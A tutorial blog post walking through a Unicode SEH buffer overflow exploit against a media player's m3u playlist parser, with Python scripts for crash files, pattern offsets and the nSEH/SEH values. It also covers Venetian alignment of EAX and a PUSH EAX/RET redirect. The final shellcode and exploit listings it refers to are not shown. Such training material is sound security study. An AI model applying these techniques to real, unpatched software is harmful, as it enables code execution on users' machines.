Unicode Buffer Overflow

This article covers the exploitation of buffer overflow vulnerabilities in applications that handle input as Unicode rather than ASCII. We will see the theory first, then the practice. To follow along, you should know how to exploit a simple buffer overflow and how an SEH exploit works, or at least the basics behind this type of vulnerability.

If you are interested in SEH exploitation, I have written an article about it.

When we send a payload to an application, the characters are usually interpreted as ASCII, a set of 128 characters (256 in the extended 8-bit code pages). One ASCII character is stored in exactly one byte of memory, so it is easy to place specific bytes in specific memory areas. In the Unicode format used here (UTF-16), by contrast, each of these characters occupies two bytes. Below is a portion of the Unicode codes for the first half of the lowercase alphabet.
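The table can be regenerated with a few lines of Python. This is a minimal sketch that assumes the little-endian UTF-16 layout used for wide-character strings on Windows; the helper name `utf16_rows` is ours.

```python
from string import ascii_lowercase

def utf16_rows(chars):
    """Return (character, code point, UTF-16LE bytes in hex) for each character."""
    return [(ch, f"U+{ord(ch):04X}", ch.encode("utf-16-le").hex(" ")) for ch in chars]

# First half of the lowercase alphabet: a..m
for ch, code_point, raw in utf16_rows(ascii_lowercase[:13]):
    print(f"{ch}  {code_point}  {raw}")  # first row: a  U+0061  61 00
```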

It is common for applications to translate buffers from ASCII format to Unicode format. All ASCII characters up to 0x7F are extended with a zero byte when they are converted to Unicode. Characters from 0x80 upward are also translated into 2 bytes, but the result may not contain the original byte value, which can create problems when building an exploit. In addition, some applications may work the opposite way and place the zeros in a different position after the transformation, so “AA” will become “0x41004100” instead of “0x00410041.”
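The effect of the translation can be simulated in Python. This is only a sketch: the helper `ansi_to_utf16le` is ours, and the code page the target really uses for the conversion is an assumption (latin-1 models plain zero-extension, cp1252 is a common Windows ANSI code page).

```python
import struct

def ansi_to_utf16le(data: bytes, codepage: str = "latin-1") -> bytes:
    """Decode single-byte input and re-encode it as UTF-16LE (two bytes per character)."""
    return data.decode(codepage).encode("utf-16-le")

# Plain ASCII: every byte gains a 0x00 companion.
expanded = ansi_to_utf16le(b"AA")
print(expanded.hex(" "))                            # 41 00 41 00

# The same four bytes read as a little-endian DWORD, as a register would show them.
print(hex(struct.unpack("<I", expanded)[0]))        # 0x410041

# Zeros on the other side of each character (big-endian layout).
print("AA".encode("utf-16-be").hex(" "))            # 00 41 00 41

# A byte above 0x7F may not survive: 0x80 is the euro sign (U+20AC) in cp1252.
print(ansi_to_utf16le(b"\x80", "cp1252").hex(" "))  # ac 20
```

The last line is the reason why bytes above 0x7F have to be tested one by one against the real application before relying on them.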

The exploitation of Unicode is very situational and requires adapting to the constraints that arise during the exploitation process. There are some general methodologies that can help exploit applications that translate to Unicode.

Let’s look at the options we have for exploiting a Unicode-translating application:

When we attempt to place the shellcode, it can also be translated. This means that the shellcode will become unusable since the translation to Unicode will add null bytes inside. However, one could encode the shellcode to make it Unicode-compatible.

The fact that most bytes are null does not mean that we cannot execute code. It just means that we are limited. There is a set of instructions that can be used even in the presence of zeros. Shellcode based on these instructions has been called Venetian shellcode. The Venetian shellcode technique is mainly used to close the gaps made by the null bytes.

The software is vulnerable when it loads a modified playlist, that is, a file with the m3u extension. We will start with a script that generates a malicious m3u file. The initial script is:
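A minimal sketch of such a starting script is shown here. The file name `crash.m3u`, the buffer size of 5000 and the function names are assumptions made for illustration.

```python
def build_playlist(size: int = 5000) -> bytes:
    """Return a buffer of 'A' characters, long enough to overflow the playlist parser (assumed size)."""
    return b"A" * size

def write_playlist(path: str, payload: bytes) -> None:
    """Write the raw payload to an .m3u file."""
    with open(path, "wb") as handle:
        handle.write(payload)

if __name__ == "__main__":
    # Hypothetical output name; any file with the m3u extension would do.
    write_playlist("crash.m3u", build_playlist())
```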

To start, we create our malicious playlist with the previous script, then we run the software and attach a debugger to it.

Then we open the malicious file from the application: bottom right on PL -> File -> Load List.

The software raises an exception.

We pass it to the application with Shift+F9. The EIP becomes 0x00410041.

This means we can overwrite the EIP. We can then verify that the exception handler structure has been overwritten by viewing the SEH chain in Immunity Debugger (View -> SEH Chain).

So this is an SEH-based Unicode buffer overflow. We need to find the offset of the SEH structure to figure out how to overwrite the EIP. We create a pattern with mona:
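For readers without mona at hand, a pattern in the same style can be sketched in Python. The generator below produces the well-known cyclic pattern of upper-case letter, lower-case letter and digit triples (Aa0Aa1Aa2...); that mona's output matches it character for character, and the length of 5000, are assumptions.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

def pattern_create(length: int) -> str:
    """Build a cyclic pattern of unique 3-character groups: Aa0Aa1Aa2..."""
    full = "".join(u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    if length > len(full):
        raise ValueError(f"pattern is limited to {len(full)} characters")
    return full[:length]

pattern = pattern_create(5000)
print(pattern[:12])  # Aa0Aa1Aa2Aa3
```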

We update the script to include the pattern we just created and repeat the previous steps: we run the script, start the app, attach a debugger to it and load the malicious file. When the exception is caught, instead of passing it to the program with Shift+F9, we analyze the SEH chain in Immunity.

We take the two consecutive values found in the SEH chain window, 0x00390072 and 0x00410038, and look up the offset like this:
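The lookup can also be reproduced by hand. In this sketch we undo the Unicode expansion of each value to recover the two pattern characters behind it, then search for them in the pattern. It assumes the standard Aa0Aa1... cyclic pattern and that 0x00410038 (the nSEH) comes first in memory, followed by 0x00390072 (the handler); the helper names are ours.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

# Full cyclic pattern (Aa0Aa1Aa2...), assumed to match the one sent to the target.
PATTERN = "".join(u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))

def dword_to_chars(value: int) -> str:
    """Undo the expansion: 0x00410038 -> bytes 38 00 41 00 -> '8A'."""
    return struct.pack("<I", value).decode("utf-16-le")

def pattern_offset(*dwords: int) -> int:
    """Offset, in pre-expansion characters, of the given consecutive DWORDs."""
    needle = "".join(dword_to_chars(d) for d in dwords)
    return PATTERN.find(needle)

print(dword_to_chars(0x00410038), dword_to_chars(0x00390072))  # 8A r9
print(pattern_offset(0x00410038, 0x00390072))                  # 536
```

The offset is counted in characters of the file, before the application doubles them into Unicode.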

The offset is 536. If we look at the exploit code on Exploit-DB, we can see that it arrives at the same result.

After 536 bytes we start writing into the SEH structure. The exploit changes to:
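The layout at this stage can be sketched as follows. The offset of 536, the Cs that end up in the EIP and the trailing D buffer come from this walkthrough; the Bs for the nSEH, the total size of 5000 and the names used are assumptions.

```python
OFFSET = 536  # characters before the SEH record, measured before the Unicode expansion

def build_payload(total: int = 5000) -> bytes:
    """junk + nSEH marker + SEH marker + trailing buffer."""
    junk = b"A" * OFFSET
    nseh = b"BB"   # 2 characters, 4 bytes after expansion (assumed marker)
    seh = b"CC"    # expands to 43 00 43 00, i.e. 0x00430043
    rest = b"D" * (total - len(junk) - len(nseh) - len(seh))
    return junk + nseh + seh + rest

payload = build_payload()
print(len(payload), payload[OFFSET:OFFSET + 4])  # 5000 b'BBCC'
```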

Then we run it and look at the SEH chain and at the EIP, which has changed.

Passing the exception to the program with Shift+F9, we notice that the EIP is not the value we expected. This is because 0x00430043 is a valid address in the application, so the program manages to execute a few more instructions than we had planned in our exploit. After a few instructions, the program reaches one that relies on data changed by the overflow, and the application crashes.

The exploitation is the same as for a classic SEH overflow. The only thing to remember is that we cannot use “\xEB\x06” to jump over the SEH, because it is not a Unicode-compatible instruction. However, there are other instructions we can use that produce the same effect. Instead of skipping over the SEH, we walk through it and fill it with instructions that do not cause the application to crash.

Let’s test the different candidate addresses; the one that has been tested and works is found at 0x004100F2. We will overwrite the nSEH with 4161, which after the transformation to Unicode becomes 0x00410061. The 41 is used to align the bytes, i.e. to complete the 4-byte structure of the nSEH so that the SEH is overwritten correctly. We will overwrite the SEH with 41F2, which after the transformation becomes 0x004100F2, the address where the POP/POP/RET sequence is located.
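The two values can be checked before touching the debugger. In this sketch the bytes are written in file order (low byte first), and latin-1 is used to model a conversion that simply appends 0x00 to each byte; that the target converts 0xF2 this way is an assumption to confirm in the debugger.

```python
import struct

def expand(data: bytes) -> bytes:
    """Model the ASCII-to-Unicode conversion as plain zero-extension of each byte."""
    return data.decode("latin-1").encode("utf-16-le")

def as_dword(data: bytes) -> int:
    """Value the CPU sees when the expanded bytes are read as a little-endian DWORD."""
    return struct.unpack("<I", expand(data))[0]

NSEH = b"\x61\x41"  # expands to 61 00 41 00: POPAD, then ADD BYTE PTR [ECX],AL
SEH = b"\xf2\x41"   # expands to F2 00 41 00: address of the POP/POP/RET

print(f"nSEH -> 0x{as_dword(NSEH):08X}")  # nSEH -> 0x00410061
print(f"SEH  -> 0x{as_dword(SEH):08X}")   # SEH  -> 0x004100F2
```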

We update our exploit with this new data and set a breakpoint after we cross the SEH.

We need to find a reference to our buffer in memory and jump to that location so that we can execute our shellcode. We can do this by making one of the registers point to our buffer, changing its current value. After running the exploit and passing the exception to the program with Shift+F9, we right-click on the EAX register and select Follow in Stack, and we see this:

We can see from the image that the EAX register holds a reference to the SEH structure. The image also shows our buffer of NOP operations (90) at the lower addresses, so if we decrement EAX a little and jump to EAX, we will be able to execute our buffer. The exploit changes to:

After execution resumes past the SEH, we absorb the leftover byte with a NOP-like instruction built from the byte \x6E. The \x00 in front of it comes from extending the preceding \x90 to Unicode format, and \x6E itself is extended to 6E 00, so the CPU sees 00 6E 00 (ADD BYTE PTR [ESI],CH). This instruction does nothing useful, but it is harmless as long as ESI points to writable memory.

Now we can operate on the EAX register. Both the ADD and SUB instructions are Unicode-compatible. However, because of the transformation to Unicode, each operand byte is extended with 00, so the values we can add or subtract are multiples of 100h (h stands for hexadecimal).

The two operations are as follows:
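The arithmetic behind this kind of adjustment can be sketched in Python. The operand bytes below are hypothetical and only illustrate the encoding; they are not necessarily the values used in this exploit. The opcodes 05 (ADD EAX, imm32) and 2D (SUB EAX, imm32) are standard x86.

```python
import struct

def expand(data: bytes) -> bytes:
    """Model the ASCII-to-Unicode conversion as plain zero-extension of each byte."""
    return data.decode("latin-1").encode("utf-16-le")

def decode_eax_op(three_bytes: bytes):
    """Return (opcode, imm32) as the CPU sees them after the expansion.

    opcode b1 b2 expands to: opcode 00 b1 00 b2 00, so imm32 = 00 b1 00 b2
    read little-endian. The last 00 is left over and must be absorbed by a
    padding byte such as \\x6E.
    """
    expanded = expand(three_bytes)
    return expanded[0], struct.unpack("<I", expanded[1:5])[0]

ADD_EAX = b"\x05\x13\x11"  # hypothetical operand: ADD EAX, 0x11001300
SUB_EAX = b"\x2d\x12\x11"  # hypothetical operand: SUB EAX, 0x11001200

_, added = decode_eax_op(ADD_EAX)
_, subtracted = decode_eax_op(SUB_EAX)
print(hex(added), hex(subtracted), hex(added - subtracted))  # 0x11001300 0x11001200 0x100
```

Because both immediates end in 00, the net change to EAX is always a multiple of 100h, which is why the register can only be moved in steps of that size.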

This adjustment is necessary to make EAX point to the part of our buffer formed by the Ds. However, when we right-click on EAX and select Follow in Stack, we notice that we do not land at the beginning of our buffer of Ds. Despite this gap, there is still enough space to place a shellcode after the address currently pointed to by EAX. We will address this gap later.

We cannot use the call EAX instruction because it is not Unicode compatible. In this case, we use PUSH EAX / RET filled with Venetian padding.
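The expansion of such a stub can be checked in Python. This is a sketch: \x50 (PUSH EAX) and \xC3 (RET) are standard x86 opcodes, while using \x6E as the padding byte between them is our assumption, based on the padding used earlier in this exploit.

```python
def expand(data: bytes) -> bytes:
    """Model the ASCII-to-Unicode conversion as plain zero-extension of each byte."""
    return data.decode("latin-1").encode("utf-16-le")

STUB = b"\x50\x6e\xc3"  # PUSH EAX, padding, RET (before expansion)

expanded = expand(STUB)
print(expanded.hex(" "))  # 50 00 6e 00 c3 00
# 50        PUSH EAX
# 00 6E 00  ADD BYTE PTR [ESI],CH   (padding that swallows the two null bytes)
# C3        RET                     (returns to the address just pushed, i.e. EAX)
# 00        never reached
```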

After passing the exception to the program, we can see that we landed in the D buffer and that the app encountered another exception. We have jumped past the breakpoints; to execute them we need to add a temporary buffer before them.

Let’s subtract the address where the D buffer begins (including the breakpoints) from the address that EAX points to. According to the screenshot below, the D buffer starts at 0x0018E238, with one leading byte that is not part of the breakpoints.

EAX points to 0x0018E318, so the difference is E0 in hexadecimal, or 224 bytes in decimal. Since Unicode turns each character into its 2-byte representation, our buffer should be 112 bytes, which is half of 224. However, we have to remember that one byte, C3, was not part of the breakpoints, so it has to be removed from the buffer, which brings the size to 111 bytes. We introduce this 111-byte offset into our exploit:
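The calculation above, written out step by step. The two addresses are the ones read from the debugger in this walkthrough; the variable names are ours.

```python
EAX_TARGET = 0x0018E318      # address EAX points to
D_BUFFER_START = 0x0018E238  # where the D buffer (with breakpoints) begins

gap_in_memory = EAX_TARGET - D_BUFFER_START  # bytes as seen in memory, after expansion
chars_needed = gap_in_memory // 2            # each character becomes 2 bytes
padding = chars_needed - 1                   # minus the C3 byte that precedes the breakpoints

print(hex(gap_in_memory), gap_in_memory, chars_needed, padding)  # 0xe0 224 112 111
```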

We were able to redirect the execution flow to an area of memory that we control. The last part will be to add the shellcode.

An alphanumeric shellcode is a specific type of shellcode that is designed to be compatible with Unicode exploits. It is built so that, once it has been sent to the targeted application and converted to Unicode format, it unpacks another set of instructions in memory at runtime. These instructions then start the actual malicious shellcode. While it is possible to create the alphanumeric shellcode manually, many security researchers and attackers use encoder tools to generate it more conveniently. Among the popular encoders are “msfvenom’s alpha encoder” and the “original alpha encoder” by SkyLined.

We generate a shellcode that will pop up the calculator with msfvenom:

Then we pass it to the encoder:

The final exploit will be:

I wrote this article in parallel with the exploitation of the software. It was an exercise in preparation for the eCXD certification.
